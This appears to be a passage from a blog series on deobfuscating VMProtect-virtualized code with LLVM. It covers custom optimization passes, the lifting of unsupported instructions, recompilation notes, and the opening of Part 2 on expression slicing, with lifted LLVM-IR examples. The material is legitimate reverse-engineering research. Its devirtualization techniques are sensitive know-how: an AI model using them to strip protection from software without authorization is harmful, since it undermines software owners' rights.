define dso_local i64 @WhatDidYouDoToMySonYouEvilMonster(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = add i64 %1, -8
  %3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
  %4 = add i64 %1, -16
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = load i64, i64* %rax, align 8
  %7 = add i64 %1, -10
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 %6, i64* %9, align 1
  %10 = bitcast i8* %8 to i32*
  %11 = trunc i64 %6 to i32
  %12 = add i64 %1, -6
  %13 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %12
  %14 = bitcast i8* %13 to i32*
  store i32 %11, i32* %14, align 1
  %15 = bitcast i8* %13 to i16*
  %16 = trunc i64 %6 to i16
  %17 = add i64 %1, -4
  %18 = add i64 %1, -12
  %19 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %18
  %20 = bitcast i8* %19 to i64*
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %17
  %22 = bitcast i8* %21 to i16*
  %23 = load i16, i16* %22, align 1
  store i16 %23, i16* %15, align 1
  %24 = load i32, i32* %14, align 1
  %25 = shl i32 %24, 8
  %26 = bitcast i8* %21 to i32*
  store i32 %25, i32* %26, align 1
  %27 = bitcast i8* %3 to i16*
  store i16 %16, i16* %27, align 1
  %28 = bitcast i8* %8 to i16*
  store i16 %16, i16* %28, align 1
  %29 = load i32, i32* %10, align 1
  %30 = shl i32 %29, 8
  %31 = bitcast i8* %3 to i32*
  store i32 %30, i32* %31, align 1
  %32 = add i64 %1, -14
  %33 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %32
  %34 = add i64 %1, -2
  %35 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %34
  %36 = bitcast i8* %35 to i16*
  %37 = load i16, i16* %36, align 1
  store i16 %37, i16* %27, align 1
  %38 = add i64 %1, -18
  %39 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %38
  %40 = bitcast i8* %39 to i64*
  store i64 %6, i64* %40, align 1
  %41 = bitcast i8* %39 to i32*
  %42 = bitcast i8* %33 to i16*
  %43 = load i16, i16* %42, align 1
  %44 = bitcast i8* %19 to i16*
  %45 = load i16, i16* %44, align 1
  store i16 %45, i16* %42, align 1
  %46 = bitcast i8* %33 to i32*
  %47 = load i32, i32* %46, align 1
  %48 = shl i32 %47, 8
  %49 = bitcast i8* %19 to i32*
  store i32 %48, i32* %49, align 1
  %50 = bitcast i8* %5 to i16*
  store i16 %43, i16* %50, align 1
  %51 = bitcast i8* %39 to i16*
  store i16 %43, i16* %51, align 1
  %52 = load i32, i32* %41, align 1
  %53 = shl i32 %52, 8
  %54 = bitcast i8* %5 to i32*
  store i32 %53, i32* %54, align 1
  %55 = load i16, i16* %28, align 1
  store i16 %55, i16* %50, align 1
  %56 = load i32, i32* %54, align 1
  store i32 %56, i32* %49, align 1
  %57 = load i64, i64* %20, align 1
  store i64 %57, i64* %rax, align 8
  ret i64 5368713262
}

Now, you can arm yourself with patience and manually match all the store and load operations, or you can trust me when I tell you that all of them are concurring to the creation of a single i64 value that will be finally saved in the rax register.

The pass is working at the intra-block level and it’s relying on the analysis results provided by the MemorySSA, ScalarEvolution and AAResults interfaces to backward walk the definition chains concurring to the creation of the value fetched by each load instruction in the block. Doing that, it is filling a structure which keeps track of the aliasing store instructions, the stored values, and the offsets and sizes overlapping with the memory slot fetched by each load. If a sequence of store assignments completely defining the value of the whole memory slot is found, the chain is processed to remove the store-to-load indirection. Subsequent passes may then rely on this new indirection-free chain to apply more transformations. As an example the previous LLVM-IR snippet turns in the following optimized LLVM-IR snippet when the MemoryCoalescing pass is applied before executing the InstCombine pass. Nice huh?

define dso_local i64 @ThanksToLLVMMySonBswap64IsBack(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rax, align 8
  %2 = call i64 @llvm.bswap.i64(i64 %1)
  store i64 %2, i64* %rax, align 8
  ret i64 5368713262
}

PartialOverlapDSE

This pass also falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Conceptually similar to the MemoryCoalescing pass, the goal of this pass is to sweep a function to identify chains of store instructions that post-dominate a single store instruction and kill its value before it is actually being fetched. Passes like DSE are doing a similar job, although limited to some forms of full overlapping caused by multiple stores on a single post-dominated store.

Applying the -O3 pipeline to the following example won’t remove the first 64 bits dead store at RAM[%0], even if the subsequent 64 bits stores at RAM[%0 - 4] and RAM[%0 + 4] fully overlap it, redefining its value.

define dso_local void @DSE(i64 %0) local_unnamed_addr #0 {
  %2 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %0
  %3 = bitcast i8* %2 to i64*
  store i64 1234605616436508552, i64* %3, align 1
  %4 = add i64 %0, -4
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = bitcast i8* %5 to i64*
  store i64 -6148858396813837381, i64* %6, align 1
  %7 = add i64 %0, 4
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 -3689348814455574802, i64* %9, align 1
  ret void
}

Adding the PartialOverlapDSE pass to the pipeline will identify and kill the first store, enabling other passes to eventually kill the chain of computations contributing to the stored value. The built-in DSE pass is most likely not executing such a kill because collecting information about multiple overlapping stores is an expensive operation.

PointersHoisting

This pass is strictly related to the IsGuaranteedLoopInvariant patch I submitted, in fact it is just identifying all the pointers that could be safely hoisted to the entry block because depending solely on values coming directly from the entry block. Applying this kind of transformation prior to the execution of the DSE pass may lead to better optimization results.

As an example, consider this devirtualized function containing a rather useless switch case. I’m saying rather useless because each store in the case blocks is post-dominated and killed by the store i32 22, i32* %85 instruction, but LLVM is not going to kill those stores until we move the pointer computation to the entry block.

define dso_local i64 @F_0x1400045b0(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = load i64, i64* %rcx, align 8
  %3 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %4 = extractvalue { i32, i32, i32, i32 } %3, 0
  %5 = extractvalue { i32, i32, i32, i32 } %3, 1
  %6 = and i32 %4, 4080
  %7 = icmp eq i32 %6, 4064
  %8 = xor i32 %4, 32
  %9 = select i1 %7, i32 %8, i32 %4
  %10 = and i32 %5, 16777215
  %11 = add i32 %9, %10
  %12 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %13 = add i64 %12, 288
  %14 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %13
  %15 = bitcast i8* %14 to i16*
  %16 = load i16, i16* %15, align 1
  %17 = zext i16 %16 to i32
  %18 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %19 = shl nuw nsw i32 %17, 7
  %20 = add i64 %18, 32
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %20
  %22 = bitcast i8* %21 to i32*
  %23 = load i32, i32* %22, align 1
  %24 = xor i32 %23, 2480
  %25 = add i32 %11, %19
  %26 = trunc i64 %18 to i32
  %27 = add i64 %18, 88
  %28 = xor i32 %25, %26
  br label %29

29:                                               ; preds = %37, %0
  %30 = phi i64 [ %27, %0 ], [ %38, %37 ]
  %31 = phi i32 [ %24, %0 ], [ %39, %37 ]
  %32 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %30
  %33 = bitcast i8* %32 to i32*
  %34 = load i32, i32* %33, align 1
  %35 = xor i32 %34, 30826
  %36 = icmp eq i32 %28, %35
  br i1 %36, label %41, label %37

37:                                               ; preds = %29
  %38 = add i64 %30, 8
  %39 = add i32 %31, -1
  %40 = icmp eq i32 %31, 1
  br i1 %40, label %86, label %29

41:                                               ; preds = %29
  %42 = add i64 %1, 40
  %43 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %42
  %44 = bitcast i8* %43 to i32*
  %45 = load i32, i32* %44, align 1
  %46 = add i64 %1, 36
  %47 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %46
  %48 = bitcast i8* %47 to i32*
  store i32 %45, i32* %48, align 1
  %49 = icmp ugt i32 %45, 5
  %50 = zext i32 %45 to i64
  %51 = add i64 %1, 32
  br i1 %49, label %81, label %52

52:                                               ; preds = %41
  %53 = shl nuw nsw i64 %50, 1
  %54 = and i64 %53, 4294967296
  %55 = sub nsw i64 %50, %54
  %56 = shl nsw i64 %55, 2
  %57 = add nsw i64 %56, 5368964976
  %58 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %57
  %59 = bitcast i8* %58 to i32*
  %60 = load i32, i32* %59, align 1
  %61 = zext i32 %60 to i64
  %62 = add nuw nsw i64 %61, 5368709120
  switch i32 %60, label %66 [
    i32 1465288, label %63
    i32 1510355, label %78
    i32 1706770, label %75
    i32 2442748, label %72
    i32 2740242, label %69
  ]

63:                                               ; preds = %52
  %64 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %65 = bitcast i8* %64 to i32*
  store i32 9, i32* %65, align 1
  br label %66

66:                                               ; preds = %52, %63
  %67 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %68 = bitcast i8* %67 to i32*
  store i32 20, i32* %68, align 1
  br label %69

69:                                               ; preds = %52, %66
  %70 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %71 = bitcast i8* %70 to i32*
  store i32 30, i32* %71, align 1
  br label %72

72:                                               ; preds = %52, %69
  %73 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %74 = bitcast i8* %73 to i32*
  store i32 55, i32* %74, align 1
  br label %75

75:                                               ; preds = %52, %72
  %76 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %77 = bitcast i8* %76 to i32*
  store i32 99, i32* %77, align 1
  br label %78

78:                                               ; preds = %52, %75
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %80 = bitcast i8* %79 to i32*
  store i32 100, i32* %80, align 1
  br label %81

81:                                               ; preds = %41, %78
  %82 = phi i64 [ %62, %78 ], [ %50, %41 ]
  %83 = phi i64 [ 5368709120, %78 ], [ %2, %41 ]
  %84 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %85 = bitcast i8* %84 to i32*
  store i32 22, i32* %85, align 1
  store i64 %83, i64* %rcx, align 8
  br label %86

86:                                               ; preds = %37, %81
  %87 = phi i64 [ %82, %81 ], [ 3735929054, %37 ]
  %88 = phi i64 [ 5368727067, %81 ], [ 0, %37 ]
  store i64 %87, i64* %rax, align 8
  ret i64 %88
}

When the PointersHoisting pass is applied before executing the DSE pass we obtain the following code, where the switch case has been completely removed because it has been deemed dead.

define dso_local i64 @F_0x1400045b0(i64* noalias nocapture nonnull align 8 dereferenceable(8) %0, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %1, i64* noalias nocapture nonnull align 8 dereferenceable(8) %2, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %3, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %4, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %5, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %6, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %7, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %15, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %16, i64 %17, i64 %18, i64 %19) local_unnamed_addr {
  %21 = load i64, i64* %7, align 8
  %22 = load i64, i64* %2, align 8
  %23 = tail call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %24 = extractvalue { i32, i32, i32, i32 } %23, 0
  %25 = extractvalue { i32, i32, i32, i32 } %23, 1
  %26 = and i32 %24, 4080
  %27 = icmp eq i32 %26, 4064
  %28 = xor i32 %24, 32
  %29 = select i1 %27, i32 %28, i32 %24
  %30 = and i32 %25, 16777215
  %31 = add i32 %29, %30
  %32 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %33 = add i64 %32, 288
  %34 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %33
  %35 = bitcast i8* %34 to i16*
  %36 = load i16, i16* %35, align 1
  %37 = zext i16 %36 to i32
  %38 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %39 = shl nuw nsw i32 %37, 7
  %40 = add i64 %38, 32
  %41 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %40
  %42 = bitcast i8* %41 to i32*
  %43 = load i32, i32* %42, align 1
  %44 = xor i32 %43, 2480
  %45 = add i32 %31, %39
  %46 = trunc i64 %38 to i32
  %47 = add i64 %38, 88
  %48 = xor i32 %45, %46
  %49 = add i64 %21, 32
  %50 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %49
  br label %51

  %52 = phi i64 [ %47, %20 ], [ %60, %59 ]
  %53 = phi i32 [ %44, %20 ], [ %61, %59 ]
  %54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
  %55 = bitcast i8* %54 to i32*
  %56 = load i32, i32* %55, align 1
  %57 = xor i32 %56, 30826
  %58 = icmp eq i32 %48, %57
  br i1 %58, label %63, label %59

  %60 = add i64 %52, 8
  %61 = add i32 %53, -1
  %62 = icmp eq i32 %53, 1
  br i1 %62, label %88, label %51

  %64 = add i64 %21, 40
  %65 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %64
  %66 = bitcast i8* %65 to i32*
  %67 = load i32, i32* %66, align 1
  %68 = add i64 %21, 36
  %69 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %68
  %70 = bitcast i8* %69 to i32*
  store i32 %67, i32* %70, align 1
  %71 = icmp ugt i32 %67, 5
  %72 = zext i32 %67 to i64
  br i1 %71, label %84, label %73

  %74 = shl nuw nsw i64 %72, 1
  %75 = and i64 %74, 4294967296
  %76 = sub nsw i64 %72, %75
  %77 = shl nsw i64 %76, 2
  %78 = add nsw i64 %77, 5368964976
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %78
  %80 = bitcast i8* %79 to i32*
  %81 = load i32, i32* %80, align 1
  %82 = zext i32 %81 to i64
  %83 = add nuw nsw i64 %82, 5368709120
  br label %84

  %85 = phi i64 [ %83, %73 ], [ %72, %63 ]
  %86 = phi i64 [ 5368709120, %73 ], [ %22, %63 ]
  %87 = bitcast i8* %50 to i32*
  store i32 22, i32* %87, align 1
  store i64 %86, i64* %2, align 8
  br label %88

  %89 = phi i64 [ %85, %84 ], [ 3735929054, %59 ]
  %90 = phi i64 [ 5368727067, %84 ], [ 0, %59 ]
  store i64 %89, i64* %0, align 8
  ret i64 %90
}

ConstantConcretization

This pass falls under the category of the generic LLVM optimization passes that are useful when dealing with obfuscated code, but basically useless, at least in the current shape, in a standard compilation pipeline. In fact, it’s not uncommon to find obfuscated code relying on constants stored in data sections added during the protection phase.

As an example, on some versions of VMProtect, when the Ultra mode is used, the conditional branch computations involve dummy constants fetched from a data section. Or if we think about a virtualized jump table (e.g. generated by a switch in the original binary), we also have to deal with a set of constants fetched from a data section.

Hence the reason for having a custom pass that, during the execution of the pipeline, identifies potential constant data accesses and converts the associated memory load into an LLVM constant (or chain of constants). This process can be referred to as constant(s) concretization.

The pass is going to identify all the load memory accesses in the function and determine if they fall in the following categories:

  • A constantexpr memory load that is using an address contained in one of the binary sections; this case is what you would hit when dealing with some kind of data-based obfuscation;
  • A symbolic memory load that is using as base an address contained in one of the binary sections and as index an expression that is constrained to a limited amount of values; this case is what you would hit when dealing with a jump table.

In both cases the user needs to provide a safe set of memory ranges that the pass can consider as read-only, otherwise the pass will restrict the concretization to addresses falling in read-only sections in the binary.

In the first case, the address is directly available and the associated value can be resolved simply parsing the binary.

In the second case the expression computing the symbolic memory access is sliced, the constraint(s) coming from the predecessor block(s) are harvested and Souper is queried in an incremental way (conceptually similar to the one used while solving the outgoing edges in a VmBlock) to obtain the set of addresses accessing the binary. Each address is then verified to be really laying in a binary section and the corresponding value is fetched. At this point we have a unique mapping between each address and its value, that we can turn into a selection cascade, illustrated in the following LLVM-IR snippet:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 2442748, i64 1465288
%96 = select i1 %91, i64 650651, i64 %95
%97 = select i1 %92, i64 2740242, i64 %96
%98 = select i1 %93, i64 1706770, i64 %97
%99 = select i1 %94, i64 1510355, i64 %98

The %99 value will hold the proper constant based on the address computed by the %89 value. The example above represents the lifted jump table shown in the next snippet, where you can notice the jump table base 0x14003E770 (5368964976) and the corresponding addresses and values:

.rdata:0x14003E770 dd 0x165BC8
.rdata:0x14003E774 dd 0x9ED9B
.rdata:0x14003E778 dd 0x29D012
.rdata:0x14003E77C dd 0x2545FC
.rdata:0x14003E780 dd 0x1A0B12
.rdata:0x14003E784 dd 0x170BD3

If we have a peek at the sliced jump condition implementing the virtualized switch case (below), this is how it looks after the ConstantConcretization pass has been scheduled in the pipeline and further InstCombine executions updated the selection cascade to compute the switch case addresses. Souper will therefore be able to identify the 6 possible outgoing edges, leading to the devirtualized switch case presented in the PointersHoisting section:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 5371151872, i64 5370415894
%96 = select i1 %91, i64 5369359775, i64 %95
%97 = select i1 %92, i64 5371449366, i64 %96
%98 = select i1 %93, i64 5370174412, i64 %97
%99 = select i1 %94, i64 5370219479, i64 %98
%100 = call i64 @HelperKeepPC(i64 %99) #15

Unsupported instructions

It is well known that all the virtualization-based protectors support only a subset of the targeted ISA. Thus, when an unsupported instruction is found, an exit from the virtual machine is executed (context switching to the host code), running the unsupported instruction(s) and re-entering the virtual machine (context switching back to the virtualized code).

The UnsupportedInstructionsLiftingToLLVM proof-of-concept is an attempt to lift the unsupported instructions to LLVM-IR, generating an InlineAsm instruction configured with the set of clobbering constraints and (ex|im)plicitly accessed registers. An execution context structure representing the general purpose registers is employed during the lifting to feed the inline assembly call instruction with the loaded registers, and to store the updated registers after the inline assembly execution.

This approach guarantees a smooth connection between two virtualized VmStubs and an intermediate sequence of unsupported instructions, enabling some of the LLVM optimizations and a better registers allocation during the recompilation phase.

An example of the lifted unsupported instruction rdtsc follows:

define void @Unsupported_rdtsc(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = tail call %IAOutTy.0 asm sideeffect inteldialect "rdtsc", "={eax},={edx}"() #1
  %3 = bitcast %ContextTy* %0 to i32*
  %4 = extractvalue %IAOutTy.0 %2, 0
  store i32 %4, i32* %3, align 4
  %5 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %6 = bitcast %RegisterW* %5 to i32*
  %7 = extractvalue %IAOutTy.0 %2, 1
  store i32 %7, i32* %6, align 4
  ret void
}

An example of the lifted unsupported instruction cpuid follows:

define void @Unsupported_cpuid(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = bitcast %ContextTy* %0 to i32*
  %3 = load i32, i32* %2, align 4
  %4 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 2, i32 0
  %5 = bitcast %RegisterW* %4 to i32*
  %6 = load i32, i32* %5, align 4
  %7 = tail call %IAOutTy asm sideeffect inteldialect "cpuid", "={eax},={ecx},={edx},={ebx},{eax},{ecx}"(i32 %3, i32 %6) #1
  %8 = extractvalue %IAOutTy %7, 0
  store i32 %8, i32* %2, align 4
  %9 = extractvalue %IAOutTy %7, 1
  store i32 %9, i32* %5, align 4
  %10 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %11 = bitcast %RegisterW* %10 to i32*
  %12 = extractvalue %IAOutTy %7, 2
  store i32 %12, i32* %11, align 4
  %13 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 1, i32 0
  %14 = bitcast %RegisterW* %13 to i32*
  %15 = extractvalue %IAOutTy %7, 3
  store i32 %15, i32* %14, align 4
  ret void
}

Recompilation

I haven’t really explored the recompilation in depth so far, because my main objective was to obtain readable LLVM-IR code, but some considerations follow:

  • If the goal is being able to execute, and eventually decompile, the recovered code, then compiling the devirtualized function using the layer of indirection offered by the general purpose register pointers is a valid way to do so. It is conceptually similar to the kind of indirection used by Remill with its own State structure. SATURN employs this technique when the stack slots and arguments recovery cannot be applied.
  • If the goal is to achieve a 1:1 register allocation, then things get more complicated because one can’t simply map all the general purpose register pointers to the hardware registers hoping for no side-effect to manifest.

The major issue to deal with when attempting a 1:1 mapping is related to how the recompilation may unexpectedly change the stack layout. This could happen if, during the register allocation phase, some spilling slot is allocated on the stack. If these additional spilling+reloading semantics are not adequately handled, some pointers used by the function may access unforeseen stack slots with disastrous results.

Results showcase

The following log files contain the output of the PoC tool executed on functions showcasing different code constructs (e.g. loop, jump table) and accessing different data structures (e.g. GS segment, DS segment, KUSER_SHARED_DATA structure):

  • 0x140001d10@DevirtualizeMe1: calling KERNEL32.dll::GetTickCount64 and literally included as nostalgia kicked in;
  • 0x140001e60@DevirtualizeMe2: executing an unsupported cpuid and with some nicely recovered llvm.fshl.i64 intrinsic calls used as rotations;
  • 0x140001d20@DevirtualizeMe2: calling ADVAPI32.dll::GetUserNameW and with a nicely recovered llvm.bswap.i64 intrinsic call;
  • 0x13001334@EMP: DllEntryPoint, calling another internal function (intra-call);
  • 0x1301d000@EMP: calling KERNEL32.dll::LoadLibraryA, KERNEL32.dll::GetProcAddress, calling other internal functions (intra-calls), executing several unsupported cpuid instructions;
  • 0x130209c0@EMP: accessing KUSER_SHARED_DATA and with nicely synthesized conditional jumps;
  • 0x1400044c0@Switches64: executing the CPUID handler and devirtualized with PointersHoisting disabled to preserve the switch case.

Searching for the @F_ pattern in your favourite text editor will bring you directly to each devirtualized VmStub, immediately preceded by the textual representation of the recovered CFG.

Afterword

I apologize for the length of the series, but I didn’t want to discard bits of information that could possibly help others approaching LLVM as a deobfuscation framework, especially knowing that, at this time, several parties are currently working on their own LLVM-based solution. I felt like showcasing its effectiveness and limitations on a well-known obfuscator was a valid way to dive through most of the details. Please note that the process described in the posts is just one of the many possible ways to approach the problem, and by no means the best way.

The source code of the proof-of-concept should be considered an experimentation playground, with everything that involves (e.g. bugs, unhandled edge cases, non production-ready quality). As a matter of fact, some of the components are barely sketched to let me focus on improving the LLVM optimization pipeline. In the future I’ll try to find the time to polish most of it, but in the meantime I hope it can at least serve as a reference to better understand the explained concepts.

Feel free to reach out with doubts, questions or even flaws you may have found in the process, I’ll be more than happy to allocate some time to discuss them.

I’d like to thank:

  • Peter, for introducing me to LLVM and working on SATURN together.
  • mrexodia and mrphrazer, for the in-depth review of the posts.
  • justmusjle, for enhancing the colors used by the diagrams.
  • Secret Club, for their suggestions and series hosting.

See you at the next LLVM adventure!

Tickling VMProtect with LLVM: Part 2

By: fvrmatteo
8 September 2021 at 23:00

This post will introduce the concepts of expression slicing and partial CFG, combining them to implement an SMT-driven algorithm to explore the virtualized CFG. Finally, some words will be spent on introducing the LLVM optimization pipeline, its configuration and its limitations.

Poor man’s slicer

Slicing a symbolic expression to be able to evaluate it, throw it at an SMT solver or match it against some pattern is something extremely common in all symbolic reasoning tools. Luckily for us this capability is trivial to implement with yet another C++ helper function. This technique has been referred to as Poor man’s slicer in the SATURN paper, hence the title of the section.

In the VMProtect context we are mainly interested in slicing one expression: the next program counter. We want to do that either while exploring the single VmBlocks (that, once connected, form a VmStub) or while exploring the VmStubs (that, once connected, form a VmFunction). The following C++ code is meant to keep only the computations related to the final value of the virtual instruction pointer at the end of a VmBlock or VmStub:

extern "C"
size_t HelperSlicePC(
  size_t rax, size_t rbx, size_t rcx, size_t rdx, size_t rsi,
  size_t rdi, size_t rbp, size_t rsp, size_t r8, size_t r9,
  size_t r10, size_t r11, size_t r12, size_t r13, size_t r14,
  size_t r15, size_t flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
{
  // Allocate the temporary virtual registers
